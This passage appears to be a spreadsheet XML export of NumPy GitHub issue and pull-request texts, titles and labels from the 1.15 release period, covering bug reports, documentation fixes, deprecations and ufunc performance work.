the  `shape : int or tuple of int`.  ([https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.empty.html](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.empty.html))_x000D_
However in example `shape` is a list of int,_x000D_
`np.empty([2, 2])`._x000D_
_x000D_
In the page [https://docs.scipy.org/doc/numpy-1.14.0/index.html](https://docs.scipy.org/doc/numpy-1.14.0/index.html)_x000D_
"The preferred way to update the documentation is by submitting a pull request on Github (see the  [Developer Guide](http://docs.scipy.org/doc/numpy-dev/dev/))."_x000D_
Unfortunately the above link is dead._x000D_
</t>
  </si>
  <si>
    <t>tuple or list in numpy.empty</t>
  </si>
  <si>
    <t>Note that `pytest` is required for NumPy &gt;= 1.15_x000D_
_x000D_
[ci skip]</t>
  </si>
  <si>
    <t>DOC: Update testing section of README.</t>
  </si>
  <si>
    <t>Astropy testing (https://github.com/astropy/astropy/issues/7587) found a problem with #11282 - scalar strings and scalar numbers now giving deprecation errors. Turns out to have been the result of an overzealous removal of a test whether `self` was flexible, something that sadly was not tested at all in our test suite. Fixed here._x000D_
_x000D_
fixes https://github.com/astropy/astropy/issues/7587</t>
  </si>
  <si>
    <t>BUG: Ensure comparisons on scalar strings pass without warning.</t>
  </si>
  <si>
    <t>Reflect changes in PR #11376 (backport #11389 ) in the release notes_x000D_
_x000D_
[ci skip]</t>
  </si>
  <si>
    <t>DOC: Remove npyiter close from notes</t>
  </si>
  <si>
    <t>Backport of #11397, in case we decide to take it</t>
  </si>
  <si>
    <t xml:space="preserve"> DEP: Rename histogramdd's normed argument to density, to match histogram</t>
  </si>
  <si>
    <t>['07 - Deprecation', '08 - Backport']</t>
  </si>
  <si>
    <t>Only emit pending deprecation warnings, to give people a few releases to switch over, rather than making them have to pick a numpy version to squash warnings._x000D_
_x000D_
~Fixes gh-4371~_x000D_
_x000D_
Leaving this as PendingDeprecationWarning since we're late in the release cycle - the important thing is to get the new argument name in, not to make noise about the old one.</t>
  </si>
  <si>
    <t>DEP: Deprecate the normed argument to histogramdd to match histogram</t>
  </si>
  <si>
    <t>Added test for #11395 which fails in 1.14 but is fixed in the current master.</t>
  </si>
  <si>
    <t>TST: Added regression test for #11395</t>
  </si>
  <si>
    <t>The following works as expected:_x000D_
```_x000D_
np.pad(np.array([1]), [(1, 0)], 'edge')_x000D_
# =&gt; array([1, 1])_x000D_
```_x000D_
But the following fails:_x000D_
```_x000D_
np.pad(np.array([None]), [(1, 0)], 'edge')_x000D_
# =&gt; {AttributeError}'NoneType' object has no attribute 'reshape'_x000D_
```_x000D_
This is because in [`_prepend_edge`](https://github.com/numpy/numpy/blob/a5d8ab86bfb29bd41ae56e81914b885143a2ff78/numpy/lib/arraypad.py#L189) and [`_append_edge`](https://github.com/numpy/numpy/blob/a5d8ab86bfb29bd41ae56e81914b885143a2ff78/numpy/lib/arraypad.py#L217) it is assumed that the indexing returns a numpy scalar or array. This is the case for most types, but apparently not for `np.object_` if a single value is retured. I suppose this can be fixed by wrapping `edge_arr` in `np.asarray()`._x000D_
_x000D_
Shall I submit a PR?</t>
  </si>
  <si>
    <t>BUG: pad with edge mode fails for object types</t>
  </si>
  <si>
    <t>MAINT: Update mailmap</t>
  </si>
  <si>
    <t>REL,MAINT: Update numpyconfig.h for 1.15.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '14 - Release', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Fix #11384.</t>
  </si>
  <si>
    <t>BUG: Make scalar.squeeze accept axis arg</t>
  </si>
  <si>
    <t xml:space="preserve">Extends PR #9998, replaces PR #11370._x000D_
_x000D_
PR #9998 introduced `NpyIter_Close` as part of the public C-API in order to resolve any `WRITEBACK_IF_COPY` semantics after iterator use. This PR removes it entirely, instead resolving writeback semantics in `NpyIter_Deallocate`._x000D_
_x000D_
Changes:_x000D_
- Extend `NpyIter_Deallocate` to include writeback resolution if needed via the operand-specific flag_x000D_
- Remove `NpyIter_Close`, adjust the c-api headers, documentation, and internal code._x000D_
- Extend `nditer_deallocate` which is called as `tp_dealloc` for the python `np.nditer` to check if writeback resolution has occurred (via a context manager `__exit__` or a direct call to `np.close`), and warn appropriately. This part requires introspection into the NpyIter. I created a non-public function to do so, is there a better way?_x000D_
- Remove a c-extension test for warnings if using `NpyIter_Deallocate` without `NpyIter_Close`_x000D_
- Repurpose a c-extension test to pure python since the warning moved levels_x000D_
_x000D_
If this is accepted it should be in 1.15 since it reverts expansion of the C-API for this version_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: Remove NpyIter_Close</t>
  </si>
  <si>
    <t>Replaces lost PR #8717. Fixes #8311. Includes tests._x000D_
_x000D_
@MareinK if you wish to continue I can give you permissions to push to the source repo for the PR.</t>
  </si>
  <si>
    <t>ENH: Allow size=0 in numpy.random.choice</t>
  </si>
  <si>
    <t>Fixes #11341 by removing `sctypeNA` and `typeNA`, left over from long ago._x000D_
~Will cause a merge conflict with PR #11340~_x000D_
_x000D_
Edit:: strike out merge conflict, that PR was merged already</t>
  </si>
  <si>
    <t>DEP: deprecate undocumented, unused dtype type dicts</t>
  </si>
  <si>
    <t>Ufuncs need to check output args for memory overlap. In `PyUFunc_GeneralizedFunction`, the check assumed the gufunc was operating elementwise._x000D_
_x000D_
Found when I started implementing matmul as a gufunc. We seem to have avoided this issue by not having an `out` `kwarg` in our current gufuncs (i.e. `linalg`, see issue #11380)._x000D_
_x000D_
This may impact downstream users of gufuncs who already try to detect this condition, but brings gufuncs into alignment with ufuncs and the comment in the code "For generalized ufuncs, we can't do buffering, so must COPY or UPDATEIFCOPY"._x000D_
_x000D_
Test added that failed before, now passes. An additional passing test added for `matmul`, which currently uses `einsum` for implementation, but that will change in the future.</t>
  </si>
  <si>
    <t>BUG: better detect memory overlap when calling gufuncs</t>
  </si>
  <si>
    <t>fixes #11378 _x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.arange(5)[[0,1,10]]_x000D_
```_x000D_
before:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
    File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
IndexError: index 10 is out of bounds for axis 1 with size 5 _x000D_
```_x000D_
_x000D_
after:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
    File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
IndexError: index 10 is out of bounds for axis 0 with size 5 _x000D_
```</t>
  </si>
  <si>
    <t>BUG: changed hardcoded axis to 0 for checking indices</t>
  </si>
  <si>
    <t>I'm seeing a confusing error message when doing fancy indexing on a 1d NumPy array. The error message is "index 10 is out of bounds for axis 1 with size 5", but the array in question is 1d, so only has a single axis. I would have expected "index 10 is out of bounds for axis 0 with size 5". See the interpreter session below (NumPy master branch at 717840c91029ac0680110838eec0103d23ccb32c; Python 3.6.5; macOS 10.13.5). I can also reproduce on NumPy 1.14.5/Python 3.6.5 and NumPy 1.13.3/Python 2.7.13._x000D_
_x000D_
```python_x000D_
taniyama:numpy mdickinson$ python_x000D_
Python 3.6.5 (default, Mar 29 2018, 15:37:32) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)] on darwin_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np_x000D_
&lt;module 'numpy' from '/Users/mdickinson/Desktop/numpy/numpy/__init__.py'&gt;_x000D_
&gt;&gt;&gt; np.arange(5)_x000D_
array([0, 1, 2, 3, 4])_x000D_
&gt;&gt;&gt; np.arange(5)[[0, 1, 10]]_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
IndexError: index 10 is out of bounds for axis 1 with size 5_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Wrong axis number in error message</t>
  </si>
  <si>
    <t>This code_x000D_
```_x000D_
import sys, numpy_x000D_
sys.modules['np'] = sys.modules['numpy']_x000D_
__import__('np.core.multiarray')_x000D_
```_x000D_
will segfault on CPython3. The code calls `PyInit_multiarray` a second time, which gets to `initialize_numeric_types`, which tries to reinitialize all the `Py*ArrType_Type`s. Normally `PyType_Ready` will check the `tp_flags` for initialized type objects, but `initialize_numeric_types` resets the flags and many more pointers. The easiest fix is to check if one of the types has already been initialized.</t>
  </si>
  <si>
    <t>WIP: BUG: Prevent running initialize_numeric_types more than once</t>
  </si>
  <si>
    <t>Relevant to gh-4371</t>
  </si>
  <si>
    <t>TST: Show that histogramdd's normed argument is histogram's density</t>
  </si>
  <si>
    <t>It is probably useful to see where I hope all my PRs lead to. Combining #11338, #11351, #11282 plus follow-up commits, the reduction is becoming quite impressive (speeds are: current master -&gt; #11351 -&gt; this PR._x000D_
```_x000D_
import numpy as np_x000D_
a = np.array(1)_x000D_
b = np.empty_like(a)_x000D_
%timeit np.positive(a)                                 # 352-&gt;348-&gt;294 ns_x000D_
%timeit np.positive(a, subok=True)                     # 606-&gt;501-&gt;377 ns_x000D_
%timeit np.positive(a, where=True)                     # 586-&gt;503-&gt;366 ns_x000D_
%timeit np.positive(a, where=True, subok=True)         # 695-&gt;531-&gt;394 ns_x000D_
%timeit np.positive(a, b)                              # 354-&gt;352-&gt;263 ns_x000D_
%timeit np.positive(a, out=b)                          # 557-&gt;480-&gt;316 ns_x000D_
%timeit np.positive(a, out=b, subok=True)              # 668-&gt;506-&gt;420 ns_x000D_
%timeit np.positive(a, out=b, where=True, subok=True)  # 752-&gt;536-&gt;451 ns_x000D_
```_x000D_
_x000D_
The main plan I followed was to use interned strings instead of `char`, and to ensure things get done only once, in particular with output arguments: `out` is now resolved right at the start and treated as a positional argument thereafter. In the process, `ufunc_full_args` disappeared again, since the code can now count on all arguments being in one place._x000D_
_x000D_
Note: no need to try to comment on all of this at once - this is mostly here to show that the work is worth it, and that I have something to refer to when discussing particular bits._x000D_
_x000D_
p.s. To my dismay, just adding `subok=True` still costs about 85 ns: 40ns in python for creating kwargs, 20ns for looking for out when it isn't there, and about 25 ns in parsing it.</t>
  </si>
  <si>
    <t>MAINT: Ufunc parsing super fast (work in progress)</t>
  </si>
  <si>
    <t>['03 - Maintenance', '15 - Discussion', '55 - Needs work', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Close gh-631_x000D_
_x000D_
Trivially backportable, if we actually care</t>
  </si>
  <si>
    <t>DOC: Clarify requirement that histogram bins are monotonic.</t>
  </si>
  <si>
    <t>A catch-all issue about lack of testing_x000D_
_x000D_
We do not run tests with a tool like coverage. It seems we don't even test all the `kwargs` for user-facing functions. Often the `out` argument is not tested at all.</t>
  </si>
  <si>
    <t>ENH: tests should cover all code paths</t>
  </si>
  <si>
    <t>['01 - Enhancement', '05 - Testing', '57 - Close?', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>Feel free to switch the base to backport (these commit are based on the shared commit between 1.15.x and master)_x000D_
_x000D_
Fixes #11364</t>
  </si>
  <si>
    <t>BUG/TST: String indexing should just fail, not emit a futurewarning</t>
  </si>
  <si>
    <t>Fixes #11363_x000D_
_x000D_
`NpyIter_Close` must be used before `NpyIter_Deallocate` to prevent warnings. _x000D_
_x000D_
Looking through the code, I see there are other places with potentially this problem:_x000D_
_x000D_
- `test_nditer_too_large` (test only)_x000D_
- 'business_day_offset`, `,business_day_count`, `is_business_day` in `datetime_busday.c` with an `out` arg_x000D_
- `array_datetime_as_string` in `datetime_strings` with an `out` arg_x000D_
_x000D_
There are other places where `NpyIter_Dealloc` is called without `NpIter_Close` but they seem to preclude allocating an array with `WRITEBACK_IF_COPY` semantics. Either the output argument is allocated locally or the flags are all `NPY_ITER_READONLY` (famous last words).</t>
  </si>
  <si>
    <t>BUG: add missing NpyIter_Close in einsum</t>
  </si>
  <si>
    <t>```_x000D_
.local/lib/python3.6/site-packages/numpy-1.15.0rc1-py3.6-linux-x86_64.egg/numpy/core/tests/test_indexing.py::TestMultiIndexingAutomated::()::test_1d_x000D_
  /usr/lib64/python3.6/unittest/case.py:195: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result._x000D_
    callable_obj(*args, **kwargs)_x000D_
```_x000D_
_x000D_
This test in indexing in 1D, so not a multi-dimensional array._x000D_
_x000D_
@eric-wieser Thoughts? (#9686)</t>
  </si>
  <si>
    <t>non-tuple indexing warning</t>
  </si>
  <si>
    <t xml:space="preserve">```_x000D_
.local/lib/python2.7/site-packages/numpy-1.16.0.dev0+387c089-py2.7-linux-x86_64.egg/numpy/core/tests/test_einsum.py::test_overlap_x000D_
  /home/charris/.local/lib/python2.7/site-packages/_pytest/python.py:142: RuntimeWarning: WRITEBACKIFCOPY detected in array_dealloc.  Required call to PyArray_ResolveWritebackIfCopy or PyArray_DiscardWritebackIfCopy is missing. This could also be caused by using a nditer without a context manager_x000D_
    testfunction(**testargs)_x000D_
```_x000D_
@mattip This looks like yours._x000D_
</t>
  </si>
  <si>
    <t>WRITEBACKIFCOPY warning</t>
  </si>
  <si>
    <t>WIP, DOC: Create 1.15.0 changelog and update mailmap.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Many,_x000D_
_x000D_
I'm looking for full names (and maybe mailing addresses) for the following NumPy contributors_x000D_
_x000D_
* [x] @zuko3d_x000D_
* [x] @tynn _x000D_
* [x] @siavashserver_x000D_
* [ ] @mamrehn_x000D_
* [x] @luzpaz _x000D_
* [x] @lumbric _x000D_
* [x] @guoci_x000D_
* [x] @fo40225_x000D_
* [x] @fivemok_x000D_
_x000D_
If you are one of the preceding, please add to this issue if you want your name to appear correctly as a contributor to the NumPy 1.15.0 release._x000D_
</t>
  </si>
  <si>
    <t>Need mailmap entry for 1.15</t>
  </si>
  <si>
    <t>a few of the functions new to 1.15 were not in any `toctree`, so documentation for them was not generated._x000D_
_x000D_
Consider backporting to 1.15, or sneaking the change in to make the release notice a little nicer?</t>
  </si>
  <si>
    <t>DOC: document new functions</t>
  </si>
  <si>
    <t xml:space="preserve">### Description / Motivation_x000D_
_x000D_
As suggested in https://github.com/numpy/numpy/pull/11033#issuecomment-386039128 and #11126 the current implementation of numpy.pad uses copies more than necessary. Currently most of the pad modes use `numpy.concatenate` under the hood to create the new array. This has to happen twice for each padded axis. It might be faster to pre-allocate the returned array once with the correct final shape and just set the appropriate edge values instead of concatenating them._x000D_
_x000D_
### Roadmap_x000D_
_x000D_
- [x] Support all existing pad modes (pass existing unit tests)_x000D_
- [x] Add documentation and comments of new code_x000D_
- [x] Profile, benchmark &amp; optimize code_x000D_
- [x] Ensure test suite is complete for old **and** new implementation_x000D_
- [x] Adress feedback &amp; reviews..._x000D_
_x000D_
### Related_x000D_
_x000D_
Closes #11126 (Initial proposal of this PR)_x000D_
Closes #11216 (search for issue number in `test_arraypad.py`)_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Rewrite numpy.pad without concatenate</t>
  </si>
  <si>
    <t>['03 - Maintenance', '51 - In progress', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>I apologize if the maintenance of the gitignore is usually handled by maintainers or subject to an extensive discussion. But I noticed that some generated files and a generated directory in `benchmarks` seem to be missing and I figured it couldn't hurt to raise this PR._x000D_
 _x000D_
The changes should be self-explanatory. _x000D_
_x000D_
Furthermore: Would it be okay to add `.directory` as created by the file manager Dolphin (from KDE) to the gitiginore or is this to specific and would clutter the file? It may fit under the section `OS generated files`.</t>
  </si>
  <si>
    <t>MAINT: Add new `_test.c` files and `benchmarks/html` to `gitignore`</t>
  </si>
  <si>
    <t>Some productive discussions on the mailing list have forged a significantly altered proposal.</t>
  </si>
  <si>
    <t>NEP: Update NEP 19: RNG Policy</t>
  </si>
  <si>
    <t>Updating `average` Docs as per Issue :Return dtype of numpy.average(a, ...) is not always that of its first argument #11290 _x000D_
_x000D_
Kindly do guide me if anything is improvable in the PR</t>
  </si>
  <si>
    <t>DOC: Update np.average docstring.</t>
  </si>
  <si>
    <t xml:space="preserve">Most of the fixes here upgrade from HTTP to HTTPS, particularly for Numpy and Scipy pages._x000D_
_x000D_
Other modifications are to update websites, as they exist today. Some older websites are revived using https://web.archive.org and few others that have no archive were marked with "(dead link)". These should be considered for either removal or replacement._x000D_
_x000D_
Some minor modifications were also done to NEPs; I can undo these if they need to be preserved._x000D_
</t>
  </si>
  <si>
    <t>DOC, MAINT: HTTP -&gt; HTTPS, and other linkrot fixes</t>
  </si>
  <si>
    <t>Documenting this argument at such length gives it authenticity it does not deserve._x000D_
_x000D_
Could backport if we want to throw this in with all the other histogram changes in 1.15</t>
  </si>
  <si>
    <t>DEP: Actually deprecate the normed argument to histogram</t>
  </si>
  <si>
    <t>This is an alternative to #11333, which doesn't use the enum and includes a drastic rewrite in terms of  conversion functions instead of the enormous switch/case loop (except for "out"). The reductions in overhead are the same as with #11333 to within a few ns (see below)._x000D_
_x000D_
@eric-wieser - what do you think? My own sense is that this will be much more easily used also for `reduce`, etc., as it follows the python parsing ideas more closely._x000D_
_x000D_
EDIT: added reductions in overhead from #11333, since I closed that one._x000D_
```_x000D_
import numpy as np_x000D_
a = np.array(1)_x000D_
b = np.empty_like(a)_x000D_
%timeit np.positive(a)                                 # 352-&gt;348 ns_x000D_
%timeit np.positive(a, subok=True)                     # 606-&gt;501 ns_x000D_
%timeit np.positive(a, where=True)                     # 586-&gt;503 ns_x000D_
%timeit np.positive(a, where=True, subok=True)         # 695-&gt;531 ns_x000D_
%timeit np.positive(a, b)                              # 354-&gt;352 ns_x000D_
%timeit np.positive(a, out=b)                          # 557-&gt;480 ns_x000D_
%timeit np.positive(a, out=b, subok=True)              # 668-&gt;506 ns_x000D_
%timeit np.positive(a, out=b, where=True, subok=True)  # 752-&gt;536 ns_x000D_
```</t>
  </si>
  <si>
    <t>MAINT: Improve speed of ufunc kwargs parsing</t>
  </si>
  <si>
    <t>A few last-minute and not-important changes, feel free to ignore. Also, see PR #11349 which would make the new functions discoverable (and turn them into links in the release notice)</t>
  </si>
  <si>
    <t>DOC: tiny tweaks to the 1.15.0 release notice</t>
  </si>
  <si>
    <t>Add support for pathlib.Path when "mmap_mode" is specified_x000D_
in np.load "Closes #11342"._x000D_
Add support for pathlib.Path in np.core.records.fromfile.</t>
  </si>
  <si>
    <t>ENH: Improve support for pathlib.Path objects in load functions</t>
  </si>
  <si>
    <t>['55 - Needs work', '56 - Needs Release Note.', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Fixes #11316, although it would be better to fix numpy/numpydoc#69 in a different way._x000D_
_x000D_
The [`:orphan:` tag](http://thomas-cokelaer.info/tutorials/sphinx/rest_syntax.html#orphan) was made specifically to silence this warning. It would be better to find a way for `autosummary` to create links to method- and attribute-specific subpages without needing anything in the templates._x000D_
_x000D_
Additionally, now that the `make html` output is cleaner, I fixed a number of small documentation problems</t>
  </si>
  <si>
    <t>DOC: Silence many sphinx warnings</t>
  </si>
  <si>
    <t xml:space="preserve">Add `np` to sys.modules so that documentation can use `` `np.dtype` `` instead of `` `numpy.dtype` `` or `` `np.dtype &lt;numpy.dtype&gt;`_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: allow np as a module for documentation</t>
  </si>
  <si>
    <t>Part of cleaning up `numerictypes.py`. The following looks wrong to me:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.sctypeNA['i8']  # any integer type_x000D_
&lt;type 'numpy.int64'&gt;_x000D_
&gt;&gt;&gt; np.sctypeNA['f8']  # any non-integer type_x000D_
'Float64'_x000D_
```_x000D_
_x000D_
Surely these should both return `type` objects, rather than sometimes returning strings?</t>
  </si>
  <si>
    <t>BUG: np.sctypeNA['i8'] and np.sctypeNA['f8'] have different semantics</t>
  </si>
  <si>
    <t>BUG: sctypeDict['f8'] randomly points to double or longdouble depending on non-deterministic dictionary iteration order</t>
  </si>
  <si>
    <t>backport of #11336</t>
  </si>
  <si>
    <t>BUG: decref in failure path; replace PyObject_Type by Py_TYPE</t>
  </si>
  <si>
    <t xml:space="preserve">Replaces #11320, for which I wrote:_x000D_
"This started as a simple fix for #11306, ensuring that as we collect arguments and overrides, we skip those that have the same class as ones collected already. But looking at the code (mostly my own...), I found a reference counting bug (first commit), and also realized that for the `ndarray` side, where all that is needed is to know whether there are *any* overrides, the code was needlessly slow. But splitting that out, there was no need any more for much of the code to be in the `src/private` directory, so I moved it. As a result, this is quite a lot of shuffling, but I think it makes the whole a lot clearer and cleaner._x000D_
_x000D_
Left really is the annoyance of not having access to the `PyArray` API - thus, this should be revisited once `multiarray` and `umath` have been merged."_x000D_
_x000D_
This PR follows @eric-wieser's request to make the commits more stand-alone, and in particular ensure that the one that moves functions around does nothing else than the move. This is true here (well, except that the names of the functions were changed)._x000D_
_x000D_
~Note that this is based on #11336 - I'll rebase once that is merged.~ EDIT: now done._x000D_
_x000D_
EDIT: also kept out the move for now, for easier review_x000D_
_x000D_
fixes #11306_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Ensure ufunc override call each class only once, plus cleanup</t>
  </si>
  <si>
    <t>[MAINT] Drop Python 3.4 support</t>
  </si>
  <si>
    <t>['03 - Maintenance', '54 - Needs decision', '55 - Needs work', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">`PyObject_Type` increases the reference count, which was not taken into account._x000D_
_x000D_
Split off from #11320, since that one was getting too complex (don't understand the failure in USE_DEBUG...), and this part should probably be back-ported._x000D_
</t>
  </si>
  <si>
    <t>BUG: decref in failure path; replace `PyObject_Type` by `Py_TYPE`</t>
  </si>
  <si>
    <t>The current example for `broadcast_arrays(x, y)` uses two copies of the same array `[1, 2, 3]`. This change instead uses two arrays of different lengths and values (`[1, 2, 3]` and `[4, 5]`) to make clearer the shapes of the outputs and where each output entry is coming from (which input array and which entry)._x000D_
Original example:_x000D_
```_x000D_
np.broadcast_arrays([[1, 2, 3]], [[1], [2], [3]]) _x000D_
-&gt;_x000D_
[array([[1, 2, 3], [1, 2, 3], [1, 2, 3]]), _x000D_
 array([[1, 1, 1], [2, 2, 2], [3, 3, 3]])]_x000D_
```_x000D_
New example:_x000D_
```_x000D_
np.broadcast_arrays([[1, 2, 3]], [[4], [5]]) _x000D_
-&gt;_x000D_
[array([[1, 2, 3], [1, 2, 3]]), _x000D_
 array([[4, 4, 4], [5, 5, 5]])]_x000D_
```</t>
  </si>
  <si>
    <t>DOC: Change array lengths/entries in `broadcast_arrays` example to reduce confusion.</t>
  </si>
  <si>
    <t>This uses the realization from inspecting similar CPython code that as we intern string names anyway, comparing keys with possible names by pointer will generally just work, and is of course much faster than first converting a unicode object to `char*` and then using `strcmp`._x000D_
_x000D_
@eric-wieser - my C remains limited: is there a cleverer way than the `enum` I used, ideally one that allows on to type things just once (there are now five places one has to keep up to date, three for the interns, one enum, and one array of the interned strings; this seems too much!)_x000D_
_x000D_
Reduces the overhead as follows:_x000D_
```_x000D_
import numpy as np_x000D_
a = np.array(1)_x000D_
b = np.empty_like(a)_x000D_
%timeit np.positive(a)                                 # 352-&gt;348 ns_x000D_
%timeit np.positive(a, subok=True)                     # 606-&gt;501 ns_x000D_
%timeit np.positive(a, where=True)                     # 586-&gt;503 ns_x000D_
%timeit np.positive(a, where=True, subok=True)         # 695-&gt;531 ns_x000D_
%timeit np.positive(a, b)                              # 354-&gt;352 ns_x000D_
%timeit np.positive(a, out=b)                          # 557-&gt;480 ns_x000D_
%timeit np.positive(a, out=b, subok=True)              # 668-&gt;506 ns_x000D_
%timeit np.positive(a, out=b, where=True, subok=True)  # 752-&gt;536 ns_x000D_
```</t>
  </si>
  <si>
    <t>MAINT: Improve speed of ufunc kwargs parsing.</t>
  </si>
  <si>
    <t>It would be great to have the possibility to multiply object in a vertorized manner, e.g. a matrix by a vector of matrices or a matrix by a vector of SciPy's linear operator, without reshaping or comprehensions._x000D_
_x000D_
If it is "currently" not supported, is there a milestone for this feature?</t>
  </si>
  <si>
    <t xml:space="preserve">A bunch of small and somewhat orthogonal cleanups, all helping a little with #10151, and maybe #6103 </t>
  </si>
  <si>
    <t>MAINT: Misc numeric cleanup</t>
  </si>
  <si>
    <t>DOC: Update release notes for 1.15.0.</t>
  </si>
  <si>
    <t>update master with the release documentation</t>
  </si>
  <si>
    <t>DOC: Update master after NumPy 1.14.5 release.</t>
  </si>
  <si>
    <t>Extracted from #10151</t>
  </si>
  <si>
    <t>MAINT: Don't use dtype strings when the dtypes themselves can be used</t>
  </si>
  <si>
    <t>Yet another one of these:_x000D_
```_x000D_
numpy.tests.test_warnings.test_warning_calls ... &lt;unknown&gt;:232: DeprecationWarning: invalid escape sequence \*_x000D_
```_x000D_
_x000D_
Seeing this when building 1.14.5 on 64-bit Linux, Python 3.6</t>
  </si>
  <si>
    <t xml:space="preserve">test_warning_calls deprecation warning </t>
  </si>
  <si>
    <t xml:space="preserve">This started as a simple fix for #11306, ensuring that as we collect arguments and overrides, we skip those that have the same class as ones collected already. But looking at the code (mostly my own...), I found a reference counting bug (first commit), and also realized that for the `ndarray` side, where all that is needed is to know whether there are *any* overrides, the code was needlessly slow. But splitting that out, there was no need any more for much of the code to be in the `src/private` directory, so I moved it. As a result, this is quite a lot of shuffling, but I think it makes the whole a lot clearer and cleaner._x000D_
_x000D_
Left really is the annoyance of not having access to the `PyArray` API - thus, this should be revisited once `multiarray` and `umath` have been merged._x000D_
_x000D_
fixes #11306 _x000D_
</t>
  </si>
  <si>
    <t>BUG,MAINT: Ensure ufunc override call each class only once, plus cleanup</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>This reverts #10676 and #10708. Those fixes to f2py exposed an error in_x000D_
a SciPy *.pyf file with the result that SciPy versions &lt; 1.0.1 could not_x000D_
be compiled with NumPy master. This reversion is only for NumPy releases_x000D_
made prior to SciPy 1.2.0, meanwhile the fix remains in master.</t>
  </si>
  <si>
    <t>REL, REV: Revert f2py fixes that exposed SciPy bug.</t>
  </si>
  <si>
    <t>REL: Setup master for 1.16 development.</t>
  </si>
  <si>
    <t>When building documentation, there are many tens of warnings `WARNING: document isn't included in any toctree`. It seems to be from class attribute `autoattribute` generated documentation. This might be a numpydoc issue, but it does not occur when building scipy documentation. Any hints where to debug this?</t>
  </si>
  <si>
    <t>BLD: warning "document not included in any toctree" while building documentation</t>
  </si>
  <si>
    <t>Ensure `tools/allocation_tracking` is included in `sdist`s.</t>
  </si>
  <si>
    <t>MAINT: Package `tools/allocation_tracking`</t>
  </si>
  <si>
    <t>This removes an unnecessary function I accidentally added in #10411._x000D_
_x000D_
The original purpose was to add a way to import a global python variable which could be toggled by the user, so it shouldn't be cached. But I removed that variable, so we don't need this function.</t>
  </si>
  <si>
    <t>MAINT: remove unused "npy_import"</t>
  </si>
  <si>
    <t xml:space="preserve">Changes I noticed while starting the release cycle for 1.14.5, forward ported from the maintenance branch and reworded/improved._x000D_
</t>
  </si>
  <si>
    <t>WIP: DOC: slightly tweak the directions to create a release</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'component: distribution']</t>
  </si>
  <si>
    <t>Create new bug-fix release documents and update RELEASE_WALKTHROUGH from master (with a frew changes)</t>
  </si>
  <si>
    <t>DOC: document release 1.14.5</t>
  </si>
  <si>
    <t>See issue #11223 and #11305._x000D_
_x000D_
Later this week I'll have more time and will look into adding coverage for this into the test suite (if nobody else gets to it first).</t>
  </si>
  <si>
    <t>BUG: Fix memmap regression when shape=None</t>
  </si>
  <si>
    <t>In the discussion of `__array_function__`, it was noted that `__array_ufunc__` is called on every operand (if present) even if an operand of the given type has already been called [1]. This seems rather senseless: if it didn't work the first time, it won't work the second time either; it may be worth checking this (though it doesn't actually cost anything in the common case that the first trial just works -- but it may speed up things a little)._x000D_
_x000D_
[1] https://github.com/numpy/numpy/pull/11303/files#diff-95f51a69624c6765b1ddae13dc0616cbR212</t>
  </si>
  <si>
    <t>MAINT/BUG? __array_ufunc__ should try a given type only once</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'Proposal', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Quickly looking at the recent changes this may be related to https://github.com/numpy/numpy/pull/11223._x000D_
_x000D_
#### A snippet to reproduce:_x000D_
```py_x000D_
import numpy as np_x000D_
_x000D_
fname = '/tmp/test.mmap'_x000D_
with open(fname, 'wb') as f:_x000D_
    f.write(b'a'*16)_x000D_
_x000D_
mm = np.memmap(fname, dtype=np.float64)_x000D_
print(mm.shape)_x000D_
```_x000D_
_x000D_
#### Output with numpy 1.14.3:_x000D_
```_x000D_
(2,)_x000D_
```_x000D_
This is what I would expect: the file contains 16 bytes which fits two float64. This also seems to agree with the `shape` docstring of `np.memmap`: "By default, the returned array will be 1-D with the number of elements determined by file size and data-type."_x000D_
_x000D_
#### Output with numpy 1.15.0.dev0+c3f9967:_x000D_
```_x000D_
()_x000D_
```_x000D_
_x000D_
_x000D_
Context: this change is causing failures in the scikit-learn tests using numpy master (this failure was first seen 7 days ago). We can work around this behaviour change if needed, but it does look like this behaviour change did not happen on purpose.</t>
  </si>
  <si>
    <t>memmap behaviour change in master when not specifying shape</t>
  </si>
  <si>
    <t>I'm getting a build error and a previously working build system._x000D_
_x000D_
Built a version a week ago without problems and had been successfully built with same image for almost a year_x000D_
_x000D_
Built is made on Docker using python:2.7-alpine as docker image base_x000D_
_x000D_
If any additional information is helpful I'll provide it. Thank you!_x000D_
_x000D_
Dockerfile:_x000D_
```_x000D_
FROM python:2.7-alpine_x000D_
# Install app dependencies_x000D_
RUN apk add --update make cmake gcc g++ gfortran &amp;&amp;\_x000D_
    ln -s /usr/include/locale.h /usr/include/xlocale.h &amp;&amp; \_x000D_
